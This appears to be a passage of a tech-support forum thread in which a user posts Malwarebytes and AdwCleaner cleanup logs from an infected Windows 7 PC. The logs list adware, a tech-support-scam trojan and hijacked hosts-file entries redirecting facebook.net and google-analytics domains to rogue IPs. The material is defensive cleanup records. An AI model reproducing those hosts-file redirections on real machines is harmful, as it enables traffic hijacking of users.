    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_pstatic.bestpriceninja.com_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_pstatic.bestpriceninja.com_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_pstatic.eshopcomp.com_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_pstatic.eshopcomp.com_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_q2u3z6t7.ssl.hwcdn.net_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_q2u3z6t7.ssl.hwcdn.net_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_www.imdb.com_0.localstorage, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    PUP.Optional.AppTrailers, C:\Users\Administrator\AppData\Local\AppTrailers\Local Storage\http_www.imdb.com_0.localstorage-journal, Quarantined, [069990e39cfe62d475dd26c5bf45a65a],
    Trojan.TechSupportScam, C:\Windows\System32\Tasks\nerta, Quarantined, [f2adb6bdeeac24124fdf10df2fd58080],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\log.txt, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nertastarter.exe.config, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\bto.ico, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Caliburn.Micro.dll, Delete-on-Reboot, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Caliburn.Micro.pdb, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Caliburn.Micro.xml, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Comparers.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Garlic.dll, Delete-on-Reboot, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Garlic.pdb, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\InstallUtil.InstallLog, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Ionic.Zip.Reduced.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\LedControl.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\LoggingControl.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Microsoft.Win32.TaskScheduler.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Microsoft.Windows.Shell.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nerta.exe, Delete-on-Reboot, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nerta.exe.config, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nerta.pdb, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nerta.vshost.exe, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\NERTA.vshost.exe.config, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nerta.vshost.exe.manifest, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nertacs.exe.config, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nertacs.InstallLog, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nertacs.InstallState, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nertacs.pdb, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nertastarter.exe, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Newtonsoft.Json.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\Newtonsoft.Json.xml, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nrtupdates.exe, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\nrtupdates.exe.config, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\PDSA.Common.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\System.Windows.Interactivity.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\System.Windows.Interactivity.xml, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\testwcf.exe, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\testwcf.exe.config, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    Trojan.TechSupportScam, C:\Program Files (x86)\Stlr\nerta\UrlHistoryLibrary.dll, Quarantined, [138cc3b0d9c179bdfa37678832d2ba46],
    PUP.Optional.DesktopFind, C:\ProgramData\desktopfindkey\desktop189.exe, Delete-on-Reboot, [7b24aec5f5a56acc684eedf161a302fe],
    PUP.Optional.TempLaunch, C:\Users\Administrator\AppData\Local\Temp\00006210\casrss.exe, Delete-on-Reboot, [a8f7155e1c7e48ee1334a328788a669a],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}\{FBC0652C-7B29-4FB6-8ADA-91F54B267AD4}\1.5\config.js, Quarantined, [e1bea2d1c3d759dd392ef2d049b9cf31],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}\{FBC0652C-7B29-4FB6-8ADA-91F54B267AD4}\1.5\tree.js, Quarantined, [e1bea2d1c3d759dd392ef2d049b9cf31],
    PUP.Optional.VBates, C:\Users\Administrator\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}\{FBC0652C-7B29-4FB6-8ADA-91F54B267AD4}\1.5\wlist.js, Quarantined, [e1bea2d1c3d759dd392ef2d049b9cf31],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo\GNUpdate\sma.exe, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo\GNUpdate\smci32.dll, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo\GNUpdate\smci64.dll, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo\GNUpdate\smi32.exe, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo\GNUpdate\smi64.exe, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo\GNUpdate\SMUninstall.exe, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo\GNUpdate\smw.sys, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\tuto_monetize_120160918\tuto_monetize_120160918\2.00\cnf.cyl, Quarantined, [c9d6244f5f3b9c9ac21376517989d729],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\tuto_monetize_120160918\tuto_monetize_120160918\2.00\eorezo.cyl, Quarantined, [c9d6244f5f3b9c9ac21376517989d729],
    PUP.Optional.LockHomepage, C:\Users\Administrator\AppData\Roaming\lockhomepage\LockHomePage.ini, Quarantined, [5c431162108ae3539b92dcf325df60a0],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\Softcof\InstallationConfiguration.xml, Quarantined, [d0cf274c38620d294587afed9272dc24],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\Softcof\uninstall.dat, Quarantined, [d0cf274c38620d294587afed9272dc24],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\Softcof\uninstall.exe, Quarantined, [d0cf274c38620d294587afed9272dc24],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\Softcof\uninstall.ico, Quarantined, [d0cf274c38620d294587afed9272dc24],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\K-Fax\InstallationConfiguration.xml, Quarantined, [3b64f3804951f145d809c6d626de2ed2],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\K-Fax\uninstall.dat, Quarantined, [3b64f3804951f145d809c6d626de2ed2],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\K-Fax\uninstall.exe, Quarantined, [3b64f3804951f145d809c6d626de2ed2],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\K-Fax\uninstall.ico, Quarantined, [3b64f3804951f145d809c6d626de2ed2],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\tree.js, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\Orosbusf64.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\config.js, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\Dawilore.dat, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\Lucwofd.dat, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\Naacwe64.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\Puteaxyn.dat, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\setup.ico, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\Vugmirsaflhv.dat, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\wlist.js, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\Xesbuhs64.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\libraries\DataExchangeScript.js, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss\certutil.exe, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss\mozcrt19.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss\nspr4.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss\nss3.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss\plc4.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss\plds4.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss\smime3.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss\softokn3.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\resources\config.js, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\resources\LocalScript.js, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\resources\uninstall.html, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\resources\wlist.js, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\bahvxfk, Quarantined, [0996dd969ffb76c06891c8d4b4508878],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\mkfvxfk, Quarantined, [0996dd969ffb76c06891c8d4b4508878],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\pvpqbjobmlpfqlovvawq, Quarantined, [0996dd969ffb76c06891c8d4b4508878],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\qokvxfk, Quarantined, [0996dd969ffb76c06891c8d4b4508878],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\rfobmlpfqlovvawq, Quarantined, [0996dd969ffb76c06891c8d4b4508878],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\rpboobmlpfqlovvawq, Quarantined, [0996dd969ffb76c06891c8d4b4508878],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\stb.dat, Quarantined, [0996dd969ffb76c06891c8d4b4508878],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\ycfvxfk, Quarantined, [0996dd969ffb76c06891c8d4b4508878],
    PUP.Optional.Linkury.ACMB1, C:\Users\Administrator\AppData\Roaming\Config.xml, Quarantined, [d5caa0d30199de58d4ede9b393719967],
    PUP.Optional.Linkury.ACMB1, C:\Users\Administrator\AppData\Roaming\InstallationConfiguration.xml, Quarantined, [9609056ed7c3d165e5dd89134abac838],
    PUP.Optional.Search.ShrtCln, C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\prefs.js, Good: (), Bad: (user_pref("browser.newtab.url", "http://www-searching.com/?site=shyo...0cshmoau,488cdb43-66e8-4d85-9ddc-52057119e93e,");), Replaced,[851aff748a10340242672e6b6d97c739]
    PUP.Optional.Search.ShrtCln, C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\prefs.js, Good: (user_pref("browser.startup.homepage", "https://www.malwarebytes.org/restorebrowser/), Bad: (user_pref("browser.startup.homepage", "http://www-searching.com/?site=shyo...0cshmoau,488cdb43-66e8-4d85-9ddc-52057119e93e,");), Replaced,[9b046d06b6e4bf77fc9ec6d9e420fa06]
    PUP.Optional.NavSmart.ClnShrt, C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\sessionstore-backups\recovery.js, Good: (), Bad: (navsmart), Replaced,[e4bb720193074de94aba3a666a9a649c]
    PUM.Optional.FireFoxSearchOverride, C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\user.js, Quarantined, [5e412d46782214226742138856aeb24e],
    Rogue.TechSupportScam, C:\Users\Administrator\AppData\Roaming\st, Quarantined, [7d221063207a50e662f140b0ce36b24e],
    PUP.Optional.HijackHosts.Gen, C:\Windows\System32\guu\puii\gajf.dat, Quarantined, [dfc0244f8515d1650da6eaaf61a3d22e],
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (107.178.247.130 connect.facebook.net), Replaced,[7728a9ca24760d29425b534ab74db54b]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (.facebook.net
    107.178.255.88 www.go), Replaced,[efb03e35c1d96ec8a5f8138acc380ff1]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (107.178.248.130 static.doubleclick.net), Replaced,[019e6d06a9f18bab3668fda0966e7987]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (.facebook.net
    107.178.255.88 www.goog), Replaced,[1d825023c9d1c86ec9d5376655af718f]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (107.178.255.88 www.google-analytics.com), Replaced,[722dd69d7624ee48e2bdd9c40cf89967]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (nalytics.com
    107.178.255.88 www.s), Replaced,[029d90e3fc9ea1957629d9c436ce6997]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (gle-analytics.com
    107.178.255), Replaced,[c5dafb78ecaeba7c930c59443dc710f0]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (.google-analytics.com
    107.178.255.88 w), Replaced,[46598ce79505280e1887009d887cd729]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (nalytics.com
    107.178.255.88 www.statcounte), Replaced,[376894df5f3ba3936a35d4c9f60e3ec2]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (tics.com
    107.178.255.88 www.statco), Replaced,[fda2e0939802a78fdbc44a538a7a1ce4]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (er.com
    107.178.255.88 ssl.google-analy), Replaced,[029d442f8119e155207f425b4eb6ce32]

    Physical Sectors: 0
    (No malicious items detected)


    (end)
     
  10. photiost

    photiost Established Techie7 Member

    Yay !!

    Nasty Blue screen no longer popping up ...

    Will continue with AdwCleaner
     
  11. photiost

    photiost Established Techie7 Member

    # AdwCleaner v6.020 - Logfile created 18/09/2016 at 21:02:48
    # Updated on 14/09/2016 by ToolsLib
    # Database : 2016-09-18.1 [Server]
    # Operating System : Windows 7 Professional Service Pack 1 (X64)
    # Username : Administrator - DELL35X8BT1
    # Running from : C:\Users\Administrator\Downloads\adwcleaner_6.020.exe
    # Mode: Clean
    # Support : https://toolslib.net/forum



    ***** [ Services ] *****

    [-] Service deleted: Kuaizip Update Checker
    [-] Service deleted: KuaiZipDrive2
    [-] Service deleted: ComputerZLock
    [-] Service deleted: ComputerZ_x64
    [-] Service deleted: HpSvc


    ***** [ Folders ] *****

    [-] Folder deleted: C:\Program Files (x86)\sunnydayb
    [-] Folder deleted: C:\Users\Public\Documents\Downloaded Installers\{0088BAD5-E065-4A0F-B4A9-3DB6803D495B}
    [-] Folder deleted: C:\WINDOWS\Installer\{0088BAD5-E065-4A0F-B4A9-3DB6803D495B}
    [-] Folder deleted: C:\Users\Administrator\AppData\Roaming\Kuaizip
    [#] Folder deleted on reboot: C:\Users\Administrator\AppData\Roaming\KuaiZip
    [-] Folder deleted: C:\Users\Administrator\AppData\Roaming\LuDaShi
    [-] Folder deleted: C:\Users\Administrator\AppData\Roaming\Softlink
    [-] Folder deleted: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Win Tune Pro
    [-] Folder deleted: C:\Users\Public\Documents\Downloaded Installers
    [#] Folder deleted on reboot: C:\Program Files (x86)\Kuaizip
    [#] Folder deleted on reboot: C:\Program Files (x86)\KuaiZip
    [-] Folder deleted: C:\Users\Administrator\AppData\Local\app
    [-] Folder deleted: C:\uninst


    ***** [ Files ] *****

    [-] File deleted: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\KuaiZip.lnk
    [-] File deleted: C:\Users\Administrator\Desktop\KuaiZip.lnk
    [-] File deleted: C:\WINDOWS\SysNative\LavasoftTcpService64.dll
    [-] File deleted: C:\WINDOWS\SysNative\LavasoftTcpServiceOff.ini
    [-] File deleted: C:\WINDOWS\SysNative\bi3.exe
    [-] File deleted: C:\WINDOWS\SysNative\drivers\swdumon.sys
    [-] File deleted: C:\WINDOWS\SysNative\drivers\KuaiZipDrive2.sys
    [-] File deleted: C:\WINDOWS\SysWOW64\lavasofttcpservice.dll
    [-] File deleted: C:\WINDOWS\SysWOW64\LavasoftTcpServiceOff.ini
    [-] File deleted: C:\Users\Administrator\AppData\Local\uninstallssl.exe
    [-] File deleted: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\invalidprefs.js


    ***** [ DLL ] *****

    [!] File not disinfected: C:\WINDOWS\SysWOW64\dnsapi.dll


    ***** [ WMI ] *****



    ***** [ Shortcuts ] *****



    ***** [ Scheduled Tasks ] *****



    ***** [ Registry ] *****

    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverUpdate
    [#] Key deleted on reboot: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverUpdate_is1
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0088BAD5-E065-4A0F-B4A9-3DB6803D495B}
    [#] Key deleted on reboot: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0088BAD5-E065-4A0F-B4A9-3DB6803D495B}_is1
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\SCService
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\SCService
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\nrtService
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\nrtService
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.001
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.002
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.003
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.004
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.005
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.006
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.007
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.008
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.009
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.01
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.010
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.011
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.012
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.013
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.014
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.015
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.016
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.017
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.018
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.019
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.02
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.020
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.021
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.022
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.023
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.024
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.025
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.026
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.027
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.028
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.029
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.03
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.030
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.031
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.032
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.033
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.034
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.035
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.036
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.037
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.038
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.039
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.04
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.040
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.041
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.042
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.043
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.044
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.045
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.046
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.047
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.048
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.049
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.05
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.050
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.051
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.052
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.053
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.054
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.055
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.056
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.057
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.058
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.059
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.06
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.060
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.061
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.062
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.063
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.064
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.065
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.066
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.067
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.068
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.069
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.07
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.070
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.071
